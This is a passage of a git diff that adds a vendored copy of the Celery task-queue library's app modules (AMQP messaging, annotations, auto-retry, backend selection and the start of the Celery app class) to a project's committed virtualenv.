_state.get_current_app()).bugreport() + + +def shared_task(*args, **kwargs): + """Create shared task (decorator). + + This can be used by library authors to create tasks that'll work + for any app environment. + + Returns: + ~celery.local.Proxy: A proxy that always takes the task from the + current apps task registry. + + Example: + + >>> from celery import Celery, shared_task + >>> @shared_task + ... def add(x, y): + ... return x + y + ... + >>> app1 = Celery(broker='amqp://') + >>> add.app is app1 + True + >>> app2 = Celery(broker='redis://') + >>> add.app is app2 + True + """ + def create_shared_task(**options): + + def __inner(fun): + name = options.get('name') + # Set as shared task so that unfinalized apps, + # and future apps will register a copy of this task. + _state.connect_on_app_finalize( + lambda app: app._task_from_fun(fun, **options) + ) + + # Force all finalized apps to take this task as well. + for app in _state._get_active_apps(): + if app.finalized: + with app._finalize_mutex: + app._task_from_fun(fun, **options) + + # Return a proxy that always gets the task from the current + # apps task registry. + def task_by_cons(): + app = _state.get_current_app() + return app.tasks[ + name or app.gen_task_name(fun.__name__, fun.__module__) + ] + return Proxy(task_by_cons) + return __inner + + if len(args) == 1 and callable(args[0]): + return create_shared_task(**kwargs)(args[0]) + return create_shared_task(*args, **kwargs) diff --git a/env/Lib/site-packages/celery/app/amqp.py b/env/Lib/site-packages/celery/app/amqp.py new file mode 100644 index 00000000..9e52af4a --- /dev/null +++ b/env/Lib/site-packages/celery/app/amqp.py @@ -0,0 +1,614 @@ +"""Sending/Receiving Messages (Kombu integration).""" +import numbers +from collections import namedtuple +from collections.abc import Mapping +from datetime import timedelta +from weakref import WeakValueDictionary + +from kombu import Connection, Consumer, Exchange, Producer, Queue, pools +from kombu.common import Broadcast +from kombu.utils.functional import maybe_list +from kombu.utils.objects import cached_property + +from celery import signals +from celery.utils.nodenames import anon_nodename +from celery.utils.saferepr import saferepr +from celery.utils.text import indent as textindent +from celery.utils.time import maybe_make_aware + +from . import routes as _routes + +__all__ = ('AMQP', 'Queues', 'task_message') + +#: earliest date supported by time.mktime. +INT_MIN = -2147483648 + +#: Human readable queue declaration. +QUEUE_FORMAT = """ +.> {0.name:<16} exchange={0.exchange.name}({0.exchange.type}) \ +key={0.routing_key} +""" + +task_message = namedtuple('task_message', + ('headers', 'properties', 'body', 'sent_event')) + + +def utf8dict(d, encoding='utf-8'): + return {k.decode(encoding) if isinstance(k, bytes) else k: v + for k, v in d.items()} + + +class Queues(dict): + """Queue name⇒ declaration mapping. + + Arguments: + queues (Iterable): Initial list/tuple or dict of queues. + create_missing (bool): By default any unknown queues will be + added automatically, but if this flag is disabled the occurrence + of unknown queues in `wanted` will raise :exc:`KeyError`. + max_priority (int): Default x-max-priority for queues with none set. + """ + + #: If set, this is a subset of queues to consume from. + #: The rest of the queues are then used for routing only. + _consume_from = None + + def __init__(self, queues=None, default_exchange=None, + create_missing=True, autoexchange=None, + max_priority=None, default_routing_key=None): + super().__init__() + self.aliases = WeakValueDictionary() + self.default_exchange = default_exchange + self.default_routing_key = default_routing_key + self.create_missing = create_missing + self.autoexchange = Exchange if autoexchange is None else autoexchange + self.max_priority = max_priority + if queues is not None and not isinstance(queues, Mapping): + queues = {q.name: q for q in queues} + queues = queues or {} + for name, q in queues.items(): + self.add(q) if isinstance(q, Queue) else self.add_compat(name, **q) + + def __getitem__(self, name): + try: + return self.aliases[name] + except KeyError: + return super().__getitem__(name) + + def __setitem__(self, name, queue): + if self.default_exchange and not queue.exchange: + queue.exchange = self.default_exchange + super().__setitem__(name, queue) + if queue.alias: + self.aliases[queue.alias] = queue + + def __missing__(self, name): + if self.create_missing: + return self.add(self.new_missing(name)) + raise KeyError(name) + + def add(self, queue, **kwargs): + """Add new queue. + + The first argument can either be a :class:`kombu.Queue` instance, + or the name of a queue. If the former the rest of the keyword + arguments are ignored, and options are simply taken from the queue + instance. + + Arguments: + queue (kombu.Queue, str): Queue to add. + exchange (kombu.Exchange, str): + if queue is str, specifies exchange name. + routing_key (str): if queue is str, specifies binding key. + exchange_type (str): if queue is str, specifies type of exchange. + **options (Any): Additional declaration options used when + queue is a str. + """ + if not isinstance(queue, Queue): + return self.add_compat(queue, **kwargs) + return self._add(queue) + + def add_compat(self, name, **options): + # docs used to use binding_key as routing key + options.setdefault('routing_key', options.get('binding_key')) + if options['routing_key'] is None: + options['routing_key'] = name + return self._add(Queue.from_dict(name, **options)) + + def _add(self, queue): + if queue.exchange is None or queue.exchange.name == '': + queue.exchange = self.default_exchange + if not queue.routing_key: + queue.routing_key = self.default_routing_key + if self.max_priority is not None: + if queue.queue_arguments is None: + queue.queue_arguments = {} + self._set_max_priority(queue.queue_arguments) + self[queue.name] = queue + return queue + + def _set_max_priority(self, args): + if 'x-max-priority' not in args and self.max_priority is not None: + return args.update({'x-max-priority': self.max_priority}) + + def format(self, indent=0, indent_first=True): + """Format routing table into string for log dumps.""" + active = self.consume_from + if not active: + return '' + info = [QUEUE_FORMAT.strip().format(q) + for _, q in sorted(active.items())] + if indent_first: + return textindent('\n'.join(info), indent) + return info[0] + '\n' + textindent('\n'.join(info[1:]), indent) + + def select_add(self, queue, **kwargs): + """Add new task queue that'll be consumed from. + + The queue will be active even when a subset has been selected + using the :option:`celery worker -Q` option. + """ + q = self.add(queue, **kwargs) + if self._consume_from is not None: + self._consume_from[q.name] = q + return q + + def select(self, include): + """Select a subset of currently defined queues to consume from. + + Arguments: + include (Sequence[str], str): Names of queues to consume from. + """ + if include: + self._consume_from = { + name: self[name] for name in maybe_list(include) + } + + def deselect(self, exclude): + """Deselect queues so that they won't be consumed from. + + Arguments: + exclude (Sequence[str], str): Names of queues to avoid + consuming from. + """ + if exclude: + exclude = maybe_list(exclude) + if self._consume_from is None: + # using all queues + return self.select(k for k in self if k not in exclude) + # using selection + for queue in exclude: + self._consume_from.pop(queue, None) + + def new_missing(self, name): + return Queue(name, self.autoexchange(name), name) + + @property + def consume_from(self): + if self._consume_from is not None: + return self._consume_from + return self + + +class AMQP: + """App AMQP API: app.amqp.""" + + Connection = Connection + Consumer = Consumer + Producer = Producer + + #: compat alias to Connection + BrokerConnection = Connection + + queues_cls = Queues + + #: Cached and prepared routing table. + _rtable = None + + #: Underlying producer pool instance automatically + #: set by the :attr:`producer_pool`. + _producer_pool = None + + # Exchange class/function used when defining automatic queues. + # For example, you can use ``autoexchange = lambda n: None`` to use the + # AMQP default exchange: a shortcut to bypass routing + # and instead send directly to the queue named in the routing key. + autoexchange = None + + #: Max size of positional argument representation used for + #: logging purposes. + argsrepr_maxsize = 1024 + + #: Max size of keyword argument representation used for logging purposes. + kwargsrepr_maxsize = 1024 + + def __init__(self, app): + self.app = app + self.task_protocols = { + 1: self.as_task_v1, + 2: self.as_task_v2, + } + self.app._conf.bind_to(self._handle_conf_update) + + @cached_property + def create_task_message(self): + return self.task_protocols[self.app.conf.task_protocol] + + @cached_property + def send_task_message(self): + return self._create_task_sender() + + def Queues(self, queues, create_missing=None, + autoexchange=None, max_priority=None): + # Create new :class:`Queues` instance, using queue defaults + # from the current configuration. + conf = self.app.conf + default_routing_key = conf.task_default_routing_key + if create_missing is None: + create_missing = conf.task_create_missing_queues + if max_priority is None: + max_priority = conf.task_queue_max_priority + if not queues and conf.task_default_queue: + queues = (Queue(conf.task_default_queue, + exchange=self.default_exchange, + routing_key=default_routing_key),) + autoexchange = (self.autoexchange if autoexchange is None + else autoexchange) + return self.queues_cls( + queues, self.default_exchange, create_missing, + autoexchange, max_priority, default_routing_key, + ) + + def Router(self, queues=None, create_missing=None): + """Return the current task router.""" + return _routes.Router(self.routes, queues or self.queues, + self.app.either('task_create_missing_queues', + create_missing), app=self.app) + + def flush_routes(self): + self._rtable = _routes.prepare(self.app.conf.task_routes) + + def TaskConsumer(self, channel, queues=None, accept=None, **kw): + if accept is None: + accept = self.app.conf.accept_content + return self.Consumer( + channel, accept=accept, + queues=queues or list(self.queues.consume_from.values()), + **kw + ) + + def as_task_v2(self, task_id, name, args=None, kwargs=None, + countdown=None, eta=None, group_id=None, group_index=None, + expires=None, retries=0, chord=None, + callbacks=None, errbacks=None, reply_to=None, + time_limit=None, soft_time_limit=None, + create_sent_event=False, root_id=None, parent_id=None, + shadow=None, chain=None, now=None, timezone=None, + origin=None, ignore_result=False, argsrepr=None, kwargsrepr=None, stamped_headers=None, + **options): + + args = args or () + kwargs = kwargs or {} + if not isinstance(args, (list, tuple)): + raise TypeError('task args must be a list or tuple') + if not isinstance(kwargs, Mapping): + raise TypeError('task keyword arguments must be a mapping') + if countdown: # convert countdown to ETA + self._verify_seconds(countdown, 'countdown') + now = now or self.app.now() + timezone = timezone or self.app.timezone + eta = maybe_make_aware( + now + timedelta(seconds=countdown), tz=timezone, + ) + if isinstance(expires, numbers.Real): + self._verify_seconds(expires, 'expires') + now = now or self.app.now() + timezone = timezone or self.app.timezone + expires = maybe_make_aware( + now + timedelta(seconds=expires), tz=timezone, + ) + if not isinstance(eta, str): + eta = eta and eta.isoformat() + # If we retry a task `expires` will already be ISO8601-formatted. + if not isinstance(expires, str): + expires = expires and expires.isoformat() + + if argsrepr is None: + argsrepr = saferepr(args, self.argsrepr_maxsize) + if kwargsrepr is None: + kwargsrepr = saferepr(kwargs, self.kwargsrepr_maxsize) + + if not root_id: # empty root_id defaults to task_id + root_id = task_id + + stamps = {header: options[header] for header in stamped_headers or []} + headers = { + 'lang': 'py', + 'task': name, + 'id': task_id, + 'shadow': shadow, + 'eta': eta, + 'expires': expires, + 'group': group_id, + 'group_index': group_index, + 'retries': retries, + 'timelimit': [time_limit, soft_time_limit], + 'root_id': root_id, + 'parent_id': parent_id, + 'argsrepr': argsrepr, + 'kwargsrepr': kwargsrepr, + 'origin': origin or anon_nodename(), + 'ignore_result': ignore_result, + 'stamped_headers': stamped_headers, + 'stamps': stamps, + } + + return task_message( + headers=headers, + properties={ + 'correlation_id': task_id, + 'reply_to': reply_to or '', + }, + body=( + args, kwargs, { + 'callbacks': callbacks, + 'errbacks': errbacks, + 'chain': chain, + 'chord': chord, + }, + ), + sent_event={ + 'uuid': task_id, + 'root_id': root_id, + 'parent_id': parent_id, + 'name': name, + 'args': argsrepr, + 'kwargs': kwargsrepr, + 'retries': retries, + 'eta': eta, + 'expires': expires, + } if create_sent_event else None, + ) + + def as_task_v1(self, task_id, name, args=None, kwargs=None, + countdown=None, eta=None, group_id=None, group_index=None, + expires=None, retries=0, + chord=None, callbacks=None, errbacks=None, reply_to=None, + time_limit=None, soft_time_limit=None, + create_sent_event=False, root_id=None, parent_id=None, + shadow=None, now=None, timezone=None, + **compat_kwargs): + args = args or () + kwargs = kwargs or {} + utc = self.utc + if not isinstance(args, (list, tuple)): + raise TypeError('task args must be a list or tuple') + if not isinstance(kwargs, Mapping): + raise TypeError('task keyword arguments must be a mapping') + if countdown: # convert countdown to ETA + self._verify_seconds(countdown, 'countdown') + now = now or self.app.now() + eta = now + timedelta(seconds=countdown) + if isinstance(expires, numbers.Real): + self._verify_seconds(expires, 'expires') + now = now or self.app.now() + expires = now + timedelta(seconds=expires) + eta = eta and eta.isoformat() + expires = expires and expires.isoformat() + + return task_message( + headers={}, + properties={ + 'correlation_id': task_id, + 'reply_to': reply_to or '', + }, + body={ + 'task': name, + 'id': task_id, + 'args': args, + 'kwargs': kwargs, + 'group': group_id, + 'group_index': group_index, + 'retries': retries, + 'eta': eta, + 'expires': expires, + 'utc': utc, + 'callbacks': callbacks, + 'errbacks': errbacks, + 'timelimit': (time_limit, soft_time_limit), + 'taskset': group_id, + 'chord': chord, + }, + sent_event={ + 'uuid': task_id, + 'name': name, + 'args': saferepr(args), + 'kwargs': saferepr(kwargs), + 'retries': retries, + 'eta': eta, + 'expires': expires, + } if create_sent_event else None, + ) + + def _verify_seconds(self, s, what): + if s < INT_MIN: + raise ValueError(f'{what} is out of range: {s!r}') + return s + + def _create_task_sender(self): + default_retry = self.app.conf.task_publish_retry + default_policy = self.app.conf.task_publish_retry_policy + default_delivery_mode = self.app.conf.task_default_delivery_mode + default_queue = self.default_queue + queues = self.queues + send_before_publish = signals.before_task_publish.send + before_receivers = signals.before_task_publish.receivers + send_after_publish = signals.after_task_publish.send + after_receivers = signals.after_task_publish.receivers + + send_task_sent = signals.task_sent.send # XXX compat + sent_receivers = signals.task_sent.receivers + + default_evd = self._event_dispatcher + default_exchange = self.default_exchange + + default_rkey = self.app.conf.task_default_routing_key + default_serializer = self.app.conf.task_serializer + default_compressor = self.app.conf.task_compression + + def send_task_message(producer, name, message, + exchange=None, routing_key=None, queue=None, + event_dispatcher=None, + retry=None, retry_policy=None, + serializer=None, delivery_mode=None, + compression=None, declare=None, + headers=None, exchange_type=None, **kwargs): + retry = default_retry if retry is None else retry + headers2, properties, body, sent_event = message + if headers: + headers2.update(headers) + if kwargs: + properties.update(kwargs) + + qname = queue + if queue is None and exchange is None: + queue = default_queue + if queue is not None: + if isinstance(queue, str): + qname, queue = queue, queues[queue] + else: + qname = queue.name + + if delivery_mode is None: + try: + delivery_mode = queue.exchange.delivery_mode + except AttributeError: + pass + delivery_mode = delivery_mode or default_delivery_mode + + if exchange_type is None: + try: + exchange_type = queue.exchange.type + except AttributeError: + exchange_type = 'direct' + + # convert to anon-exchange, when exchange not set and direct ex. + if (not exchange or not routing_key) and exchange_type == 'direct': + exchange, routing_key = '', qname + elif exchange is None: + # not topic exchange, and exchange not undefined + exchange = queue.exchange.name or default_exchange + routing_key = routing_key or queue.routing_key or default_rkey + if declare is None and queue and not isinstance(queue, Broadcast): + declare = [queue] + + # merge default and custom policy + retry = default_retry if retry is None else retry + _rp = (dict(default_policy, **retry_policy) if retry_policy + else default_policy) + + if before_receivers: + send_before_publish( + sender=name, body=body, + exchange=exchange, routing_key=routing_key, + declare=declare, headers=headers2, + properties=properties, retry_policy=retry_policy, + ) + ret = producer.publish( + body, + exchange=exchange, + routing_key=routing_key, + serializer=serializer or default_serializer, + compression=compression or default_compressor, + retry=retry, retry_policy=_rp, + delivery_mode=delivery_mode, declare=declare, + headers=headers2, + **properties + ) + if after_receivers: + send_after_publish(sender=name, body=body, headers=headers2, + exchange=exchange, routing_key=routing_key) + if sent_receivers: # XXX deprecated + if isinstance(body, tuple): # protocol version 2 + send_task_sent( + sender=name, task_id=headers2['id'], task=name, + args=body[0], kwargs=body[1], + eta=headers2['eta'], taskset=headers2['group'], + ) + else: # protocol version 1 + send_task_sent( + sender=name, task_id=body['id'], task=name, + args=body['args'], kwargs=body['kwargs'], + eta=body['eta'], taskset=body['taskset'], + ) + if sent_event: + evd = event_dispatcher or default_evd + exname = exchange + if isinstance(exname, Exchange): + exname = exname.name + sent_event.update({ + 'queue': qname, + 'exchange': exname, + 'routing_key': routing_key, + }) + evd.publish('task-sent', sent_event, + producer, retry=retry, retry_policy=retry_policy) + return ret + return send_task_message + + @cached_property + def default_queue(self): + return self.queues[self.app.conf.task_default_queue] + + @cached_property + def queues(self): + """Queue name⇒ declaration mapping.""" + return self.Queues(self.app.conf.task_queues) + + @queues.setter + def queues(self, queues): + return self.Queues(queues) + + @property + def routes(self): + if self._rtable is None: + self.flush_routes() + return self._rtable + + @cached_property + def router(self): + return self.Router() + + @router.setter + def router(self, value): + return value + + @property + def producer_pool(self): + if self._producer_pool is None: + self._producer_pool = pools.producers[ + self.app.connection_for_write()] + self._producer_pool.limit = self.app.pool.limit + return self._producer_pool + publisher_pool = producer_pool # compat alias + + @cached_property + def default_exchange(self): + return Exchange(self.app.conf.task_default_exchange, + self.app.conf.task_default_exchange_type) + + @cached_property + def utc(self): + return self.app.conf.enable_utc + + @cached_property + def _event_dispatcher(self): + # We call Dispatcher.publish with a custom producer + # so don't need the dispatcher to be enabled. + return self.app.events.Dispatcher(enabled=False) + + def _handle_conf_update(self, *args, **kwargs): + if ('task_routes' in kwargs or 'task_routes' in args): + self.flush_routes() + self.router = self.Router() + return diff --git a/env/Lib/site-packages/celery/app/annotations.py b/env/Lib/site-packages/celery/app/annotations.py new file mode 100644 index 00000000..1c0631f7 --- /dev/null +++ b/env/Lib/site-packages/celery/app/annotations.py @@ -0,0 +1,52 @@ +"""Task Annotations. + +Annotations is a nice term for monkey-patching task classes +in the configuration. + +This prepares and performs the annotations in the +:setting:`task_annotations` setting. +""" +from celery.utils.functional import firstmethod, mlazy +from celery.utils.imports import instantiate + +_first_match = firstmethod('annotate') +_first_match_any = firstmethod('annotate_any') + +__all__ = ('MapAnnotation', 'prepare', 'resolve_all') + + +class MapAnnotation(dict): + """Annotation map: task_name => attributes.""" + + def annotate_any(self): + try: + return dict(self['*']) + except KeyError: + pass + + def annotate(self, task): + try: + return dict(self[task.name]) + except KeyError: + pass + + +def prepare(annotations): + """Expand the :setting:`task_annotations` setting.""" + def expand_annotation(annotation): + if isinstance(annotation, dict): + return MapAnnotation(annotation) + elif isinstance(annotation, str): + return mlazy(instantiate, annotation) + return annotation + + if annotations is None: + return () + elif not isinstance(annotations, (list, tuple)): + annotations = (annotations,) + return [expand_annotation(anno) for anno in annotations] + + +def resolve_all(anno, task): + """Resolve all pending annotations.""" + return (x for x in (_first_match(anno, task), _first_match_any(anno)) if x) diff --git a/env/Lib/site-packages/celery/app/autoretry.py b/env/Lib/site-packages/celery/app/autoretry.py new file mode 100644 index 00000000..80bd81f5 --- /dev/null +++ b/env/Lib/site-packages/celery/app/autoretry.py @@ -0,0 +1,66 @@ +"""Tasks auto-retry functionality.""" +from vine.utils import wraps + +from celery.exceptions import Ignore, Retry +from celery.utils.time import get_exponential_backoff_interval + + +def add_autoretry_behaviour(task, **options): + """Wrap task's `run` method with auto-retry functionality.""" + autoretry_for = tuple( + options.get('autoretry_for', + getattr(task, 'autoretry_for', ())) + ) + dont_autoretry_for = tuple( + options.get('dont_autoretry_for', + getattr(task, 'dont_autoretry_for', ())) + ) + retry_kwargs = options.get( + 'retry_kwargs', getattr(task, 'retry_kwargs', {}) + ) + retry_backoff = float( + options.get('retry_backoff', + getattr(task, 'retry_backoff', False)) + ) + retry_backoff_max = int( + options.get('retry_backoff_max', + getattr(task, 'retry_backoff_max', 600)) + ) + retry_jitter = options.get( + 'retry_jitter', getattr(task, 'retry_jitter', True) + ) + + if autoretry_for and not hasattr(task, '_orig_run'): + + @wraps(task.run) + def run(*args, **kwargs): + try: + return task._orig_run(*args, **kwargs) + except Ignore: + # If Ignore signal occurs task shouldn't be retried, + # even if it suits autoretry_for list + raise + except Retry: + raise + except dont_autoretry_for: + raise + except autoretry_for as exc: + if retry_backoff: + retry_kwargs['countdown'] = \ + get_exponential_backoff_interval( + factor=int(max(1.0, retry_backoff)), + retries=task.request.retries, + maximum=retry_backoff_max, + full_jitter=retry_jitter) + # Override max_retries + if hasattr(task, 'override_max_retries'): + retry_kwargs['max_retries'] = getattr(task, + 'override_max_retries', + task.max_retries) + ret = task.retry(exc=exc, **retry_kwargs) + # Stop propagation + if hasattr(task, 'override_max_retries'): + delattr(task, 'override_max_retries') + raise ret + + task._orig_run, task.run = task.run, run diff --git a/env/Lib/site-packages/celery/app/backends.py b/env/Lib/site-packages/celery/app/backends.py new file mode 100644 index 00000000..5481528f --- /dev/null +++ b/env/Lib/site-packages/celery/app/backends.py @@ -0,0 +1,68 @@ +"""Backend selection.""" +import sys +import types + +from celery._state import current_app +from celery.exceptions import ImproperlyConfigured, reraise +from celery.utils.imports import load_extension_class_names, symbol_by_name + +__all__ = ('by_name', 'by_url') + +UNKNOWN_BACKEND = """ +Unknown result backend: {0!r}. Did you spell that correctly? ({1!r}) +""" + +BACKEND_ALIASES = { + 'rpc': 'celery.backends.rpc.RPCBackend', + 'cache': 'celery.backends.cache:CacheBackend', + 'redis': 'celery.backends.redis:RedisBackend', + 'rediss': 'celery.backends.redis:RedisBackend', + 'sentinel': 'celery.backends.redis:SentinelBackend', + 'mongodb': 'celery.backends.mongodb:MongoBackend', + 'db': 'celery.backends.database:DatabaseBackend', + 'database': 'celery.backends.database:DatabaseBackend', + 'elasticsearch': 'celery.backends.elasticsearch:ElasticsearchBackend', + 'cassandra': 'celery.backends.cassandra:CassandraBackend', + 'couchbase': 'celery.backends.couchbase:CouchbaseBackend', + 'couchdb': 'celery.backends.couchdb:CouchBackend', + 'cosmosdbsql': 'celery.backends.cosmosdbsql:CosmosDBSQLBackend', + 'riak': 'celery.backends.riak:RiakBackend', + 'file': 'celery.backends.filesystem:FilesystemBackend', + 'disabled': 'celery.backends.base:DisabledBackend', + 'consul': 'celery.backends.consul:ConsulBackend', + 'dynamodb': 'celery.backends.dynamodb:DynamoDBBackend', + 'azureblockblob': 'celery.backends.azureblockblob:AzureBlockBlobBackend', + 'arangodb': 'celery.backends.arangodb:ArangoDbBackend', + 's3': 'celery.backends.s3:S3Backend', +} + + +def by_name(backend=None, loader=None, + extension_namespace='celery.result_backends'): + """Get backend class by name/alias.""" + backend = backend or 'disabled' + loader = loader or current_app.loader + aliases = dict(BACKEND_ALIASES, **loader.override_backends) + aliases.update(load_extension_class_names(extension_namespace)) + try: + cls = symbol_by_name(backend, aliases) + except ValueError as exc: + reraise(ImproperlyConfigured, ImproperlyConfigured( + UNKNOWN_BACKEND.strip().format(backend, exc)), sys.exc_info()[2]) + if isinstance(cls, types.ModuleType): + raise ImproperlyConfigured(UNKNOWN_BACKEND.strip().format( + backend, 'is a Python module, not a backend class.')) + return cls + + +def by_url(backend=None, loader=None): + """Get backend class by URL.""" + url = None + if backend and '://' in backend: + url = backend + scheme, _, _ = url.partition('://') + if '+' in scheme: + backend, url = url.split('+', 1) + else: + backend = scheme + return by_name(backend, loader), url diff --git a/env/Lib/site-packages/celery/app/base.py b/env/Lib/site-packages/celery/app/base.py new file mode 100644 index 00000000..cfd71c62 --- /dev/null +++ b/env/Lib/site-packages/celery/app/base.py @@ -0,0 +1,1366 @@ +"""Actual App instance implementation.""" +import inspect +import os +import sys +import threading +import warnings +from collections import UserDict, defaultdict, deque +from datetime import datetime +from operator import attrgetter + +from click.exceptions import Exit +from kombu import pools +from kombu.clocks import LamportClock +from kombu.common import oid_from +from kombu.utils.compat import register_after_fork +from kombu.utils.objects import cached_property +from kombu.utils.uuid import uuid +from vine import starpromise + +from celery import platforms, signals +from celery._state import (_announce_app_finalized, _deregister_app, _register_app, _set_current_app, _task_stack, + connect_on_app_finalize, get_current_app, get_current_worker_task, set_default_app) +from celery.exceptions import AlwaysEagerIgnored, ImproperlyConfigured +from celery.loaders import get_loader_cls +from celery.local import PromiseProxy, maybe_evaluate +from celery.utils import abstract +from celery.utils.collections import AttributeDictMixin +from celery.utils.dispatch import Signal +from celery.utils.functional import first, head_from_fun, maybe_list +from celery.utils.imports import gen_task_name, instantiate, symbol_by_name +from celery.utils.log import get_logger +from celery.utils.objects import FallbackContext, mro_lookup +from celery.utils.time import maybe_make_aware, timezone, to_utc + +# Load all builtin tasks +from . import backends, builtins # noqa +from .annotations import prepare as prepare_annotations +from .autoretry import add_autoretry_behaviour +from .defaults import DEFAULT_SECURITY_DIGEST, find_deprecated_settings +from .registry import TaskRegistry +from .utils import (AppPickler, Settings, _new_key_to_old, _old_key_to_new, _unpickle_app, _unpickle_app_v2, appstr, + bugreport, detect_settings) + +__all__ = ('Celery',) + +logger = get_logger(__name__) + +BUILTIN_FIXUPS = { + 'celery.fixups.django:fixup', +} +USING_EXECV = os.environ.get('FORKED_BY_MULTIPROCESSING') + +ERR_ENVVAR_NOT_SET = """ +The environment variable {0!r} is not set, +and as such the configuration could not be loaded. + +Please set this variable and make sure it points to +a valid configuration module. + +Example: + {0}="proj.celeryconfig" +""" + + +def app_has_custom(app, attr): + """Return true if app has customized method `attr`. + + Note: + This is used for optimizations in cases where we know + how the default behavior works, but need to account + for someone using inheritance to override a method/property. + """ + return mro_lookup(app.__class__, attr, stop={Celery, object}, + monkey_patched=[__name__]) + + +def _unpickle_appattr(reverse_name, args): + """Unpickle app.""" + # Given an attribute name and a list of args, gets + # the attribute from the current app and calls it. + return get_current_app()._rgetattr(reverse_name)(*args) + + +def _after_fork_cleanup_app(app): + # This is used with multiprocessing.register_after_fork, + # so need to be at module level. + try: + app._after_fork() + except Exception as exc: # pylint: disable=broad-except + logger.info('after forker raised exception: %r', exc, exc_info=1) + + +class PendingConfiguration(UserDict, AttributeDictMixin): + # `app.conf` will be of this type before being explicitly configured, + # meaning the app can keep any configuration set directly + # on `app.conf` before the `app.config_from_object` call. + # + # accessing any key will finalize the configuration, + # replacing `app.conf` with a concrete settings object. + + callback = None + _data = None + + def __init__(self, conf, callback): + object.__setattr__(self, '_data', conf) + object.__setattr__(self, 'callback', callback) + + def __setitem__(self, key, value): + self._data[key] = value + + def clear(self): + self._data.clear() + + def update(self, *args, **kwargs): + self._data.update(*args, **kwargs) + + def setdefault(self, *args, **kwargs): + return self._data.setdefault(*args, **kwargs) + + def __contains__(self, key): + # XXX will not show finalized configuration + # setdefault will cause `key in d` to happen, + # so for setdefault to be lazy, so does contains. + return key in self._data + + def __len__(self): + return len(self.data) + + def __repr__(self): + return repr(self.data) + + @cached_property + def data(self): + return self.callback() + + +class Celery: + """Celery application. + + Arguments: + main (str): Name of the main module if running as `__main__`. + This is used as the prefix for auto-generated task names. + + Keyword Arguments: + broker (str): URL of the default broker used. + backend (Union[str, Type[celery.backends.base.Backend]]): + The result store backend class, or the name of the backend + class to use. + + Default is the value of the :setting:`result_backend` setting. + autofinalize (bool): If set to False a :exc:`RuntimeError` + will be raised if the task registry or tasks are used before + the app is finalized. + set_as_current (bool): Make this the global current app. + include (List[str]): List of modules every worker should import. + + amqp (Union[str, Type[AMQP]]): AMQP object or class name. + events (Union[str, Type[celery.app.events.Events]]): Events object or + class name. + log (Union[str, Type[Logging]]): Log object or class name. + control (Union[str, Type[celery.app.control.Control]]): Control object + or class name. + tasks (Union[str, Type[TaskRegistry]]): A task registry, or the name of + a registry class. + fixups (List[str]): List of fix-up plug-ins (e.g., see + :mod:`celery.fixups.django`). + config_source (Union[str, class]): Take configuration from a class, + or object. Attributes may include any settings described in + the documentation. + task_cls (Union[str, Type[celery.app.task.Task]]): base task class to + use. See :ref:`this section ` for usage. + """ + + #: This is deprecated, use :meth:`reduce_keys` instead + Pickler = AppPickler + + SYSTEM = platforms.SYSTEM + IS_macOS, IS_WINDOWS = platforms.IS_macOS, platforms.IS_WINDOWS + + #: Name of the `__main__` module. Required for standalone scripts. + #: + #: If set this will be used instead of `__main__` when automatically + #: generating task names. + main = None + + #: Custom options for command-line programs. + #: See :ref:`extending-commandoptions` + user_options = None + + #: Custom bootsteps to extend and modify the worker. + #: See :ref:`extending-bootsteps`. + steps = None + + builtin_fixups = BUILTIN_FIXUPS + + amqp_cls = 'celery.app.amqp:AMQP' + backend_cls = None + events_cls = 'celery.app.events:Events' + loader_cls = None + log_cls = 'celery.app.log:Logging' + control_cls = 'celery.app.control:Control' + task_cls = 'celery.app.task:Task' + registry_cls = 'celery.app.registry:TaskRegistry' + + #: Thread local storage. + _local = None + _fixups = None + _pool = None + _conf = None + _after_fork_registered = False + + #: Signal sent when app is loading configuration. + on_configure = None + + #: Signal sent after app has prepared the configuration. + on_after_configure = None + + #: Signal sent after app has been finalized. + on_after_finalize = None + + #: Signal sent by every new process after fork. + on_after_fork = None + + def __init__(self, main=None, loader=None, backend=None, + amqp=None, events=None, log=None, control=None, + set_as_current=True, tasks=None, broker=None, include=None, + changes=None, config_source=None, fixups=None, task_cls=None, + autofinalize=True, namespace=None, strict_typing=True, + **kwargs): + + self._local = threading.local() + self._backend_cache = None + + self.clock = LamportClock() + self.main = main + self.amqp_cls = amqp or self.amqp_cls + self.events_cls = events or self.events_cls + self.loader_cls = loader or self._get_default_loader() + self.log_cls = log or self.log_cls + self.control_cls = control or self.control_cls + self.task_cls = task_cls or self.task_cls + self.set_as_current = set_as_current + self.registry_cls = symbol_by_name(self.registry_cls) + self.user_options = defaultdict(set) + self.steps = defaultdict(set) + self.autofinalize = autofinalize + self.namespace = namespace + self.strict_typing = strict_typing + + self.configured = False + self._config_source = config_source + self._pending_defaults = deque() + self._pending_periodic_tasks = deque() + + self.finalized = False + self._finalize_mutex = threading.RLock() + self._pending = deque() + self._tasks = tasks + if not isinstance(self._tasks, TaskRegistry): + self._tasks = self.registry_cls(self._tasks or {}) + + # If the class defines a custom __reduce_args__ we need to use + # the old way of pickling apps: pickling a list of + # args instead of the new way that pickles a dict of keywords. + self._using_v1_reduce = app_has_custom(self, '__reduce_args__') + + # these options are moved to the config to + # simplify pickling of the app object. + self._preconf = changes or {} + self._preconf_set_by_auto = set() + self.__autoset('broker_url', broker) + self.__autoset('result_backend', backend) + self.__autoset('include', include) + + for key, value in kwargs.items(): + self.__autoset(key, value) + + self._conf = Settings( + PendingConfiguration( + self._preconf, self._finalize_pending_conf), + prefix=self.namespace, + keys=(_old_key_to_new, _new_key_to_old), + ) + + # - Apply fix-ups. + self.fixups = set(self.builtin_fixups) if fixups is None else fixups + # ...store fixup instances in _fixups to keep weakrefs alive. + self._fixups = [symbol_by_name(fixup)(self) for fixup in self.fixups] + + if self.set_as_current: + self.set_current() + + # Signals + if self.on_configure is None: + # used to be a method pre 4.0 + self.on_configure = Signal(name='app.on_configure') + self.on_after_configure = Signal( + name='app.on_after_configure', + providing_args={'source'}, + ) + self.on_after_finalize = Signal(name='app.on_after_finalize') + self.on_after_fork = Signal(name='app.on_after_fork') + + # Boolean signalling, whether fast_trace_task are enabled. + # this attribute is set in celery.worker.trace and checked by celery.worker.request + self.use_fast_trace_task = False + + self.on_init() + _register_app(self) + + def _get_default_loader(self): + # the --loader command-line argument sets the environment variable. + return ( + os.environ.get('CELERY_LOADER') or + self.loader_cls or + 'celery.loaders.app:AppLoader' + ) + + def on_init(self): + """Optional callback called at init.""" + + def __autoset(self, key, value): + if value is not None: + self._preconf[key] = value + self._preconf_set_by_auto.add(key) + + def set_current(self): + """Make this the current app for this thread.""" + _set_current_app(self) + + def set_default(self): + """Make this the default app for all 